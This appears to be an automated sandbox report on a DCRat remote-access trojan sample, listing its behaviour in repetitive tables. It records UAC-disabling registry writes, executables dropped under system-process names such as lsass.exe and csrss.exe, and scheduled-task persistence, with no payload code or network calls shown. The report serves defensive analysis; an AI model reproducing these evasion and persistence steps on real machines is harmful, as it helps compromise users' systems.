Malware Analysis Report

2024-10-10 12:53

Sample ID 240531-yhsctsba7t
Target 25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8
SHA256 25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8
Tags
rat dcrat evasion execution infostealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8

Threat Level: Known bad

The file 25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8 was found to be: Known bad.

Malicious Activity Summary

rat dcrat evasion execution infostealer trojan

DCRat payload

UAC bypass

Process spawned unexpected child process

DcRat

Dcrat family

DCRat payload

Detects executables packed with SmartAssembly

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Executes dropped EXE

Checks whether UAC is enabled

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Creates scheduled task(s)

Modifies registry class

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

System policy modification

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-31 19:47

Signatures

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Dcrat family

dcrat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-31 19:47

Reported

2024-05-31 19:50

Platform

win7-20240221-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe"

Signatures

DcRat

rat infostealer dcrat

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables packed with SmartAssembly

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\lsass.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\lsass.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\MSOCache\All Users\lsass.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Windows Media Player\fr-FR\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\RCX3E2C.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsm.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files\Windows Journal\it-IT\886983d96e3d3e C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Internet Explorer\SIGNUP\27d1bcfc3c54e0 C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\42af1c969fbb7b C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Microsoft Office\Office14\1033\RCX3079.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\fr-FR\RCX3715.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Windows Mail\fr-FR\RCX4A47.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files\Microsoft Office\Office14\1033\wininit.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\RCX2C50.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\RCX2C51.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\RCX3E2B.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\RCX40AD.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Windows Mail\fr-FR\RCX4A46.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsm.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files\Windows Journal\it-IT\csrss.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Windows Journal\it-IT\RCX3918.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\SIGNUP\RCX3BAA.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Windows Mail\fr-FR\System.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\audiodg.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Internet Explorer\SIGNUP\System.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\smss.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Windows Mail\fr-FR\System.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Windows Mail\fr-FR\27d1bcfc3c54e0 C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Windows Journal\it-IT\csrss.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Microsoft Office\Office14\1033\RCX307A.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Microsoft Office\Office14\1033\wininit.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\RCX40AE.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\RCX517D.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\69ddcba757bf72 C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\System.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\27d1bcfc3c54e0 C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\audiodg.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Windows Journal\it-IT\RCX3987.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\SIGNUP\System.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\SIGNUP\RCX3BAB.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\System.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\RCX517E.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\101b941d020240 C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files\Microsoft Office\Office14\1033\56085415360792 C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Windows Media Player\fr-FR\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Program Files (x86)\Windows Media Player\fr-FR\397cb10b2d4e0e C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\fr-FR\RCX3714.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\smss.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\SoftwareDistribution\DataStore\System.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File created C:\Windows\SoftwareDistribution\DataStore\27d1bcfc3c54e0 C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\RCX45C0.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\RCX45C1.tmp C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\System.exe C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
